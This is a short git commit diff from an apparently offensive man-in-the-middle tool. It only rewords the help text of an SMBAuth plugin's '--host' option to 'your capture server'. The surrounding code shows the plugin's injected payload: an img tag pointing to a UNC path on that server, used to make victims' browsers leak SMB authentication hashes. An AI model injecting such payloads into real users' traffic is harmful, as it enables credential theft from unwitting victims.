formatting

This commit is contained in:
byt3bl33d3r 2014-07-14 16:24:12 +02:00
parent 1b6841f9c1
commit eedb48822a
4 changed files with 10 additions and 7 deletions

View file

@ -12,7 +12,7 @@ class SMBAuth(Inject,Plugin):
self.html_payload = self._get_data()
def add_options(self,options):
options.add_argument("--host", action="store_true", help="The ip address of the SMB server")
options.add_argument("--host", action="store_true", help="The ip address of your capture server")
def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\